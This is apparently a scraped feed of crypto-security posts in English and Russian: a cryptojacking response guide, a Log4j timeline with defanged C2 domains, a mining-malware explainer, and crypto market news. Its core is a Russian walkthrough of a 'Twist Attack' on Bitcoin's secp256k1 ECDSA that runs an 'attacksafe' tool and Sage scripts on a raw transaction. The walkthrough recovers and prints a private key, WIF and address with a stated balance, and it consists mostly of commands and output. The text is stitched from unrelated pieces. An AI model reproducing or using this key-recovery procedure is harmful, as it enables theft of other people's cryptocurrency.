waiting around for something potentially catastrophic to happen,” LogRhythm’s Vincent says. Monitor your websites for cryptomining code. Farral warns that cryptojackers are finding ways to place bits of Javascript code on web servers. “The server itself isn’t the target, but anyone visiting the website itself [risks infection],” he says. He recommends regularly monitoring for file changes on the web server or changes to the pages themselves. How to respond to a cryptojacking attack After illicit cryptomining activity has been detected, responding to a cryptojacking attack should follow standard cyber incident response steps that include containment, eradication, recovery, and lessons learned. Some tips for how to respond to a cryptojacking attack include: Kill web-delivered scripts. For in-browser JavaScript attacks, the solution is simple once cryptomining is detected: Kill the browser tab running the script. IT should note the website URL that’s the source of the script and update the company’s web filters to block it. Shut down compromised container instances. Immutable cloud infrastructure like container instances that are compromised with coin miners can also be handled simply, by shutting down infected container instances and starting fresh. However, organizations must dig into the root causes that led to the container compromise in the first place. This means looking for signs that the container dashboard and credentials have been compromised and examining connected cloud resources for signs of compromise. A key step is ensuring that the fresh new container image to replace the old one isn’t similarly configured. Reduce permissions and regenerate API keys. Eradicating and fully recovering from cloud-based cryptojacking will require organizations to reduce permissions to impacted cloud resources (and those connected to them) and regenerating API keys to prevent attackers from walking right back into the same cloud environment. Learn and adapt. Use the experience to better understand how the attacker was able to compromise your systems. Update your user, helpdesk, IT, and SOC analyst training so they are better able to identify cryptojacking attempts and respond accordingly. Editor’s note: This article, orginally published in February 2018, has been updated to include new research, best practices, and cryptojacking examples. The Apache Log4j vulnerabilities: A timeline The Apache Log4j vulnerability has impacted organizations around the globe. Here is a timeline of the key events surrounding the Log4j exploit as they have unfolded. The Apache Log4j vulnerability has made global headlines since it was discovered in early December. The flaw has impacted vast numbers of organizations around the world as security teams have scrambled to mitigate the associated risks. Here is a timeline of the key events surrounding the Log4j vulnerability as they have unfolded. Thursday, December 9: Apache Log4j zero-day exploit discovered Apache released details on a critical vulnerability in Log4j, a logging library used in millions of Java-based applications. Attackers began exploiting the flaw (CVE-2021-44228) – dubbed “Log4Shell”, which was rated 10 out of 10 on the CVSS vulnerability rating scale. It could lead to remote code execution (RCE) on underlying servers that run vulnerable applications. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” Apache developers wrote in an advisory. A fix for the issue was made available with the release of Log4j 2.15.0 as security teams from around the globe worked to protect their organizations. Businesses were urged to install the latest version. Friday, December 10: UK NCSC issues Log4j warning to UK organizations As the fallout from the vulnerability continued, the UK’s National Cyber Security Centre (NCSC) issued a public warning to UK companies about the flaw and outlined strategies for mitigation. The NCSC advised all organizations to install the latest update immediately wherever Log4j was known to be used. “This should be the first priority for all UK organizations using software that is known to include Log4j. Organizations should update both internet-facing and non-internet facing software,” the statement read. Businesses were also urged to seek out unknown instances of Log4j and deploy protective network monitoring/blocking. Saturday, December 11: CISA director comments on “urgent challenge to network defenders” Much like the UK’s NCSC, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) publicly responded to the Log4j vulnerability with director Jen Easterly reflecting upon the urgent challenge it presented to network defenders. “CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the Log4j software library,” she said in a statement. “We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies – and signals to non-federal partners – to urgently patch or remediate this vulnerability. We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability.” CISA recommended asset owners to take three additional, immediate steps to help mitigate the vulnerability: Enumerate any external facing devices that have Log4j installed Ensure security operations centers are actioning every single alert on the devices that fall into the category above Install a web application firewall with rules that automatically update so that security operations centers (SOCs) can concentrate on fewer alerts Tuesday, December 14: Second Log4j vulnerability carrying denial-of-service threat detected, new patch released A second vulnerability impacting Apache Log4j was discovered. The new exploit, CVE 2021-45046, allowed malicious actors to craft malicious input data using a JNDI lookup pattern to create denial-of-service (DoS) attacks, according to the CVE description. A new patch for the exploit was made available which removed support for message lookup patterns and disabled JNDI functionality by default, with the Log4j 2.15.0 fix for the original flaw incomplete in certain non-default configurations. “While CVE-2021-45046 is less severe than the original vulnerability, it becomes another vector for threat actors to conduct malicious attacks against unpatched or improperly patched systems,” Amy Chang, head of risk and response at Resilience, told CSO shortly after the flaw was discovered. “The incomplete patch to CVE-2021-44228 could be abused to craft malicious input data, which could result in a DoS attack. A DoS attack can shut down a machine or network and render it inaccessible to its intended users,” she added. Organizations were advised to update to Log4j: 2.16.0 as soon as possible. Friday, December 17: Third Log4j vulnerability revealed, new fix made available Apache published details of a third major Log4j vulnerability and made yet another fix available. This was an infinite recursion flaw rated 7.5 out of 10. “The Log4j team has been made aware of a security vulnerability, CVE-2021-45105, that has been addressed in Log4j 2.17.0 for Java 8 and up,” it wrote. “Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DoS (denial-of-service) attack.” Apache also outlined the following mitigations: In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId}or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC) Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input Monday, December 20: Log4j exploited to install Dridex and Meterpreter Cybersecurity research group Cryptolaemus warned that the Log4j vulnerability was being exploited to infect Windows devices with the Dridex banking Trojan and Linux devices with Meterpreter. Dridex is a form of malware that steals bank credentials via a system that uses macros from Microsoft Word, while Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore a target machine and execute code. Cryptolaemus member Joseph Roosen told BleepingComputer that threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server. Wednesday, December 22: Data shows 10% of all assets vulnerable to Log4Shell Data released by cybersecurity vendor Tenable revealed that that one in 10 of all assets were vulnerable to Log4Shell, while 30% of organizations had not begun scanning for the bug. “Of the assets that have been assessed, Log4Shell has been found in approximately 10% of them, including a wide range of servers, web applications, containers and IoT devices,” read a Tenable blog posting. “Log4Shell is pervasive across all industries and geographies. One in 10 corporate servers being exposed. One in 10 web applications and so on. One in 10 of nearly every aspect of our digital infrastructure has the potential for malicious exploitation via Log4Shell.” The vendor warned that Log4Shell carries a greater potential threat than EternalBlue (exploited in the WannaCry attacks) because of the pervasiveness of Log4j across both infrastructure and applications. “No single vulnerability in history has so blatantly called out for remediation. Log4Shell will define computing as we know it, separating those that put in the effort to protect themselves and those comfortable being negligent,” it added. Tuesday, January 4: FTC tells companies to patch Log4j vulnerability, threatens legal action The Federal Trade Commission (FTC) urged U.S. organizations to patch the Log4Shell vulnerability immediately or risk facing punitive action from the agency. “When vulnerabilities are discovered and exploited, it risks a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm Leach Bliley Act,” the FTC said. It added that it is critical that companies and their vendors relying on Log4j act now to reduce the likelihood of harm to consumers and to avoid FTC legal action. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” Monday, January 10: Microsoft warns of China-based ransomware operator exploiting Log4Shell Microsoft updated its Log4j vulnerability guidance page with details of a China-based ransomware operator (DEV-0401) targeting internet-facing systems and deploying the NightSky ransomware. “As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon,” it wrote. “DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).” Based on Microsoft’s analysis, attackers were discovered to be using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203. Security 101: The Impact of Cryptocurrency-Mining Malware The Australian government has just recognized digital currency as a legal payment method. Since July 1, purchases done using digital currencies such as bitcoin are exempt from the country’s Goods and Services Tax to avoid double taxation. As such, traders and investors will not be levied taxes for buying and selling them through legal exchange platforms. Japan, which legitimized bitcoin as a form of payment last April, already expects more than 20,000 merchants to accept bitcoin payments. Other countries are joining the bandwagon, albeit partially: businesses and some of the public organizations in Switzerland, Norway, and the Netherlands. In a recent study, unique, active users of cryptocurrency wallets are pegged between 2.9 and 5.8 million, most of which are in North America and Europe. But what does the acceptance and adoption of digital currencies have to do with online threats? A lot, actually. As cryptocurrencies like bitcoin gain real-world traction, so will cybercriminal threats that abuse it. But how, exactly? What does this mean to businesses and everyday users? What is cryptocurrency? Cryptocurrency is an encrypted data string that denotes a unit of currency. It is monitored and organized by a peer-to-peer network also known as a blockchain, which also serves as a secure ledger of transactions, e.g., buying, selling, and transferring. Unlike physical money, cryptocurrencies are decentralized, which means they are not issued by governments or other financial institutions. Cryptocurrencies are created (and secured) through cryptographic algorithms that are maintained and confirmed in a process called mining, where a network of computers or specialized hardware such as application-specific integrated circuits (ASICs) process and validate the transactions. The process incentivizes the miners who run the network with the cryptocurrency. Bitcoin isn’t the be-all and end-all There are actually over 700 cryptocurrencies, but only some are readily traded and even less have market capitalization above $100 million. Bitcoin, for instance, was created by Satoshi Nakamoto (pseudonym) and released in 2009 as open-source code. Blockchain technology made it all work, providing a system where data structures (blocks) are broadcasted, validated, and registered in a public, distributed database through a network of communication endpoints (nodes). While bitcoin is the most famous cryptocurrency, there are other popular alternatives. Ethereum took “smart contracts” up a notch by making the programming languages needed to code them more accessible to developers. Agreements, or conditional/if-then transactions, are written as code and executed (as long as requirements are met) in Ethereum’s blockchain. Ethereum, however, earned notoriety after a hacker exploited a vulnerability in the Digital Autonomous Organization (DAO) running on Ethereum’s software, siphoning US $50 million worth of ether (Ethereum’s currency). This resulted in the development of Ethereum Classic, based the original blockchain, and Ethereum, its upgraded version (via a hard fork). There are also other notable cryptocurrencies: Litecoin, Dogecoin, Monero. Litecoin is a purportedly technical improvement of Bitcoin that is capable of faster turnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84 million Litecoins—four times as many cryptocurrency units issued by Bitcoin. Monero is notable for its use of ring signatures (a type of digital signature) and CryptoNote application layer protocol to protect the privacy of its transactions—amount, origin, and destination. Dogecoin, which was initially developed for educational or entertainment purposes, was intended for a broader demographic. Capable of generating uncapped dogecoins, it also uses Scrypt to drive the currency along. Cryptocurrency mining also drew cybercriminal attention Cryptocurrencies have no borders—anyone can send them anytime anywhere, without delays or additional/hidden charges from intermediaries. Given their nature, they are more secure from fraud and identity theft as cryptocurrencies cannot be counterfeited, and personal information is behind a cryptographic wall. Unfortunately, the same apparent profitability, convenience, and pseudonymity of cryptocurrencies also made them ideal for cybercriminals, as ransomware operators showed. The increasing popularity of cryptocurrencies coincide with the incidences of malware that infect systems and devices, turning them into armies of cryptocurrency-mining machines. Cryptocurrency mining is a computationally intensive task that requires significant resources from dedicated processors, graphics cards, and other hardware. While mining does generate money, there are many caveats. The profit is relative to a miner’s investment on the hardware, not to mention the electricity costs to power them. Cryptocurrencies are mined in blocks; in bitcoin, for instance, each time a certain number of hashes are solved, the number of bitcoins that can be awarded to the miner per block is halved. Since the bitcoin network is designed to generate the cryptocurrency every 10 minutes, the difficulty of solving another hash is adjusted. And as mining power increases, the resource requirement for mining a new block piles up. Payouts are relatively small and eventually decrease every four years—in 2016, the reward for mining a block was halved to 12.5 BTC (or $32,000 as of July 5, 2017). Consequently, many join forces into pools to make mining more efficient. Profit is divided between the group, depending on how much effort a miner exerted. Cryptocurrency-mining malware use similar attack vectors Bad guys turn to using malware to skirt around these challenges. There is, however a caveat for cybercriminal miners: internet-connected devices and machines, while fast enough to process network data, don’t have extensive number-crunching capabilities. To offset this, cryptocurrency-mining malware are designed to zombify botnets of computers to perform these tasks. Others avoided subtlety altogether—in 2014, Harvard’s supercomputer cluster Odyssey was used to illicitly mine dogecoins. During the same year, a similar incident happened to US agency National Science Foundation’s own supercomputers. In early February 2017, one of the US Federal Reserve’s servers was misused to mine for bitcoins. Cryptocurrency-mining malware employ the same modus operandi as many other threats—from malware-toting spam emails and downloads from malicious URLs to junkware and potentially unwanted applications (PUAs). In January 2014, a vulnerability in Yahoo!’s Java-based advertisement network was compromised, exposing European end users to malvertisements that delivered a bitcoin-mining malware. A month before it, German law enforcement arrested hackers for purportedly using malware to mine over $954,000 worth of bitcoins. We’ve seen the emergence of hacking tools and backdoors related to cybercriminal bitcoin mining as early as 2011, and we’ve since seen a variety of cryptocurrency-mining threats that add more capabilities, such as distributed denial-of-service and URL spoofing. Another even tried to masquerade as a component for one of Trend Micro’s products. In 2014, the threat crossed over to Android devices as Kagecoin, capable of mining bitcoin, litecoin, and dogecoin. A remote access Trojan (RAT) njrat/Njw0rm readily shared in the Middle Eastern underground was modified to add bitcoin-mining functionality. The same was done to an old Java RAT that can mine litecoin. This year’s notable cryptocurrency-mining malware so far are Adylkuzz, CPUMiner/EternalMiner, and Linux.MulDrop.14. All exploit vulnerabilities. Adylkuzz leverages EternalBlue, the same security flaw that WannaCry ransomware used to destructive effect, while CPUMiner/EternalMiner used SambaCry, a vulnerability in interoperability software suite Samba. Linux.MulDrop.14, a Linux Trojan, targets Raspberry Pi devices. These threats infected devices and machines and turned them into monero-mining botnets. Cryptocurrency-mining malware’s impact makes them a credible threat Cryptocurrency-mining malware steal the resources of infected machines, significantly affecting their performance and increasing their wear and tear. An infection also involves other costs, like increased power consumption. But we’ve also found that their impact goes beyond performance issues. From January 1 to June 24, 2017, our sensors detected 4,894 bitcoin miners that triggered over 460,259 bitcoin-mining activities, and found that more than 20% of these miners also triggered web and network-based attacks. We even found intrusion attempts linked to a ransomware’s attack vector. The most prevalent of these attacks we saw were: Cross-site scripting Exploiting a remote code execution vulnerability in Microsoft’s Internet Information Server (IIS) Brute force and default password logins/attacks Command buffer overflow exploits Hypertext Preprocessor (PHP) arbitrary code injection SQL injection BlackNurse denial of service attack These malware can threaten the availability, integrity, and security of a network or system, which can potentially result in disruptions to an enterprise’s mission-critical operations. Information theft and system hijacking are also daunting repercussions. These attacks can also be the conduit from which additional malware are delivered. Internet of Things (IoT) devices are also in the crosshairs of cryptocurrency-mining malware—from digital video recorders (DVRs)/surveillance cameras, set-top boxes, network-attached storage (NAS) devices, and especially routers, given their ubiquity among home and corporate environments. In April 2017, a variant of Mirai surfaced with bitcoin-mining capabilities. Mirai’s notoriety sprung from the havoc it wrought in IoT devices, particularly home routers, using them to knock high-profile sites offline last year. Over the first three quarters of 2016, we detected a bitcoin-mining zombie army made up of Windows systems, home routers, and IP cameras. From January 1 to June 24, 2017, we also observed different kinds of devices that were mining bitcoin, although our telemetry cannot verify if these activities were authorized. We also saw bitcoin mining activities surge by 40% from 1,800 triggered events daily in February to 3,000 in March, 2017. While bitcoin mining isn’t inherently illegal (at least in many countries), it can entail a compromise if it doesn’t have the owner’s knowledge and consent. We found that machines running Windows had the most bitcoin mining activities, but also of note are: Systems on Macintosh OSes, including iOS (iPhone 4 to iPhone 7) Devices run on Ubuntu OS, a derivative of Debian Linux OS Home routers Environment-monitoring devices, used in data centers Android-run smart TVs and mobile devices IP cameras Print servers Gaming consoles [READ: How to secure your router against Mirai and home network attacks] Cryptocurrency-mining malware can make victims a part of the problem Cryptocurrency-mining malware can impair system performance and risk end users and businesses to information theft, hijacking, and a plethora of other malware. And by turning these machines into zombies, cryptocurrency malware can even inadvertently make its victims part of the problem. Indeed, their adverse impact to the devices they infect—and ultimately a business’ asset or a user’s data—makes them a credible threat. There is no silver bullet for these malware, but they can be mitigated by following these best practices: Regularly updating your device with the latest patches helps prevent attackers from using vulnerabilities as doorways into the systems Changing or strengthening the device’s default credentials makes the device less prone to unauthorized access Enabling the device’s firewall (for home routers), if available, or deploying intrusion detection and prevention systems to mitigate incursion attempts Taking caution against known attack vectors: socially engineered links, attachments or files from suspicious websites, dubious third-party software/applications, and unsolicited emails IT/system administrators and information security professionals can also consider application whitelisting or similar security mechanisms that prevent suspicious executables from running or installing. Proactively monitoring network traffic helps better identify red flags that may indicate malware infection. Applying the principle of least privilege, developing countermeasures against web injections, securing the email gateway, implementing best practices for corporate mobile devices, and cultivating a cybersecurity-aware workforce are part of a defense-in-depth approach to reducing an enterprise’s exposure to these threats. Ultimately, however, the security of internet-connected devices against cryptocurrency-mining malware isn’t just a burden for their users. Original design and equipment manufacturers also play vital roles in securing the ecosystems they run in. https://cryptodeeptech.ru/blockchain-attack-vectors/ Majority is not Enough: Bitcoin Mining is Vulnerable https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/PNDBjoT83zA Source: https://cryptodeep.ru/log4j-vulnerability
-
- Закрытыйключ
- Криптография
-
(and 8 more)
Tagged with:
-
CRYPTO DEEP TECH Не так давно пакет elliptic (6.5.4) для стандартных эллиптических кривых был уязвим для различных атак, одним из которых является Twist Attack. Криптографическая проблема была в реализации secp256k1. Нам известно что криптовалюта Биткоин использует secp256k1 и эта атака не обошла Биткоин стороной, согласно уязвимости CVE-2020-28498 подтверждающие стороны транзакции алгоритма ECDSA через определенные точки на эллиптической кривой secp256k1 передавали частичные значение приватного ключа (более простые подгруппы состоящие от 5 до 45 bit ) которые называются секстическими поворотами [sextic twists] этот процесс настолько опасен что раскрывает зашифрованные данные после выполнения ряда операций ECC. В этой статье мы реализуем Twist Attack на примере и покажем как с помощью определенных точек на эллиптической кривой secp256k1 мы можем получить частичные значение приватного ключа и в течение 5-15 минут восстановить Биткоин Кошелек используя “Sagemath pollard rho function: (discrete_log_rho)” и “Chinese Remainder Theorem”. https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md Согласно твиту Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21 The cofactor is 3^2*13^2*3319*22639 E1: 20412485227 E2: 3319, 22639 E3: 109903, 12977017, 383229727 E4: 18979 E6: 10903, 5290657, 10833080827, 22921299619447 prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447 38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031 HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5 E1: y^2 = x^3 + 1 E2: y^2 = x^3 + 2 E3: y^2 = x^3 + 3 E4: y^2 = x^3 + 4 E6: y^2 = x^3 + 6 https://attacksafe.ru/twist-attack-on-bitcoin y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7 b '= -x ^ 3 - ax. Перейдем к экспериментальной части: (Рассмотрим Биткоин Адрес) (Теперь рассмотрим критический уязвимые транзакции) Откроем [TerminalGoogleColab]. Реализуем алгоритм Twist Attack с помощью нашей репозитории 18TwistAttack git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls Установим все нужные нам пакеты requirements.txt sudo apt install python2-minimal wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py pip2 install -r requirements.txt , Подготовим RawTX для атаки RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000 Сохраним в файле: RawTX.txt RawTX.txt Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE” www.attacksafe.ru/software Права доступа: chmod +x attacksafe Применение: ./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode ./attacksafe -version Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023] "ATTACKSAFE SOFTWARE" включает в себя все популярные атаки на Биткоин. Запустим список всех атак: ./attacksafe -list Выберем -tool: twist_attack Чтобы получить определенные точки secp256k1 из уязвимой транзакции подписи ECDSA, мы добавили данные RawTX в текстовый документ и сохранил как файл RawTX.txt 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000 Запустим -tool twist_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” ./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt Мы запустили данную атаку из -tool twist_attack и результат сохранился в файл SecretPoints.txt Теперь чтобы посмотреть успешный результат откроем файл SecretPoints.txt cat SecretPoints.txt Результат: Elliptic Curve Secret Points: Q11 = E1([34618671789393965854613640290360235391647615481000045539933705415932995630501, 99667531170720247708472095466452031806107030061686920872303526306525502090483]) Q21 = E2([68702062392910446859944685018576437177285905222869560568664822150761686878291, 78930926874118321017229422673239275133078679240453338682049329315217408793256]) Q22 = E2([36187226669165513276610993963284034580749604088670076857796544959800936658648, 78047996896912977465701149036258546447875229540566494608083363212907320694556]) Q31 = E3([14202326166782503089885498550308551381051624037047010679115490407616052746319, 30141335236272151189582083030021707964727207106390862186771517460219968539461]) Q32 = E3([92652014076758100644785068345546545590717837495536733539625902385181839840915, 110864801034380605661536039273640968489603707115084229873394641092410549997600]) Q33 = E3([13733962489803830542904605575055556603039713775204829607439941608751927073977, 70664870695578622971339822919870548708506276012055865037147804103600164648175]) Q41 = E4([46717592694718488699519343483827728052018707080103013431011626167943885955457, 6469304805650436779501027074909634426373884406581114581098958955015476304831]) Q61 = E6([47561520942485905499349109889401345889145902913672896164353162929760278620178, 23509073020931558264499314846549082835888014703370452565866789873039982616042]) Q62 = E6([54160295444050675202099928029758489687871616334443609215013972520342661686310, 61948858375012652103923933825519305763658240249902247802977736768072021476029]) Q63 = E6([80766121303237997819855855617475110324697780810565482439175845706674419107782, 43455623036669369134087288965186672649514660807369135243341314597351364060230]) Q64 = E6([27687597533944257266141093122549631098147853637408570994849207294960615279263, 8473112666362672787600475720236754473089370067288223871796416412432107486062]) RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000 Теперь добавим полученные точки secp256k1 Для этого откроем Python-script: discrete.py Для того чтобы запустить Python-script: discrete.py установим SageMath Команда установки: sudo apt-get update sudo apt-get install -y python3-gmpy2 yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath Проверим установку SageMath по команде: sage -v SageMath version 9.0 Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py Команда запуска: sage -python3 discrete.py Результат: Discrete_log_rho: 5663673254 229 19231 43549 11713353 47161820 13016 6068 1461826 5248038982 9034433903442 PRIVATE KEY: 4843137891892877119728403798088723017104154997204069979961743654961499092503 privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64]) Конвертируем приватный ключ в HEX формат Десятичный формат приватного ключа был сохранен в файл: privkey.txt Запустим Python-script: privkey2hex.py python3 privkey2hex.py cat privkey2hex.txt Откроем полученный файл: privkey2hex.txt Приватный ключ в HEX формате: PrivKey = 0ab51e7092866dadf86165ea0d70beb69086237a0e7f5a123d496d3d98e03617 Откроем bitaddress и проверим: ADDR: 1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq WIF: KwaXPrvbWF5USy3GCh453UDGWXnBSroiKKtE6ebtmHHxGKaRmVD6 HEX: 0AB51E7092866DADF86165EA0D70BEB69086237A0E7F5A123D496D3D98E03617 https://live.blockcypher.com/btc/address/1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq/ BALANCE: $ 775.77 Исходный код ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/S_ZUcM2cD8I Источник: https://cryptodeep.ru/twist-attack Криптоанализ
-
- Закрытыйключ
- Криптография
-
(and 8 more)
Tagged with:
-
МВФ призвал законодателей принять дополнительные меры в области регулирования, чтобы избежать влияния фактора волатильности криптоактивов, затрагивающего банки и традиционные финансовые учреждения. В МВФ констатировали, что волатильность и нестабильность криптовалютного рынка начинает беспокоить не только регуляторов, но и представителей традиционной финансовой сферы. Учитывая расширение связей между криптовалютным и фондовым рынками, нестабильность крипторынка, возникающая в результате различных коллапсов, все чаще несет в себе опасность для традиционных финансовых институтов и финансовой стабильности стран. Для контроля и управления рисками МВФ предлагает разработать глобальные правила для поставщиков услуг виртуальных активов, в частности, запретить смешивать клиентские активы, размещенные в криптовалютных компаниях, с инвестициями в компании традиционной финансовой сферы. Помимо этого, МВФ рекомендовал законодателям рассмотреть возможности для воспрепятствования криптизации экономики и замещения фиатных валют посредством криптоактивов, в первую очередь долларовых стейблкоинов. Подробнее: https://bits.media/mvf-prizyvaet-prinyat-dopolnitelnye-mery-regulirovaniya/
-
- МВФ
- Криптография
-
(and 8 more)
Tagged with:
-
По словам обозревателя CNBC и ведущего Mad Money Джима Крамера, в 2023 году сообществу не стоит ожидать крупных взлетов криптопроектов, поскольку в отрасли будут преобладать депрессивные настроения. Джим Крамер (Jim Cramer) поделился со своими подписчиками в Твиттере предположением, что царящий в криптосообществе скептицизм не позволит цифровым активам показать какие-либо значимые результаты в 2023 году. Крамер считает, что последние события существенно повлияли на предпочтения инвесторов и их общую заинтересованность в криптоактивах. «Я предсказываю еще один депрессивный год для криптографии и думаю, сколько миллионов людей все еще осталось вовлеченными», — написал Крамер в Твиттере. Ранее сервис мониторинга криптоактивов PricePrediction с помощью искусственного интеллекта спрогнозировал курс биткоина на начало 2023 года. По версии алгоритмов, через месяц биткоин будет торговаться по $15 532. Это примерно на 7% ниже текущей стоимости BTC. В целом, ожидается, что в течение января курс первой криптовалюты будет снижаться. Напомним, что 2022 год BTC закончил на минорной ноте — монета потеряла более 70% от максимума 2021 года. Подробнее: https://bits.media/dzhim-kramer-predskazal-eshche-odin-slabyy-god-dlya-kriptografii/
-
- Курс_биткоина
- Эфириум
- (and 8 more)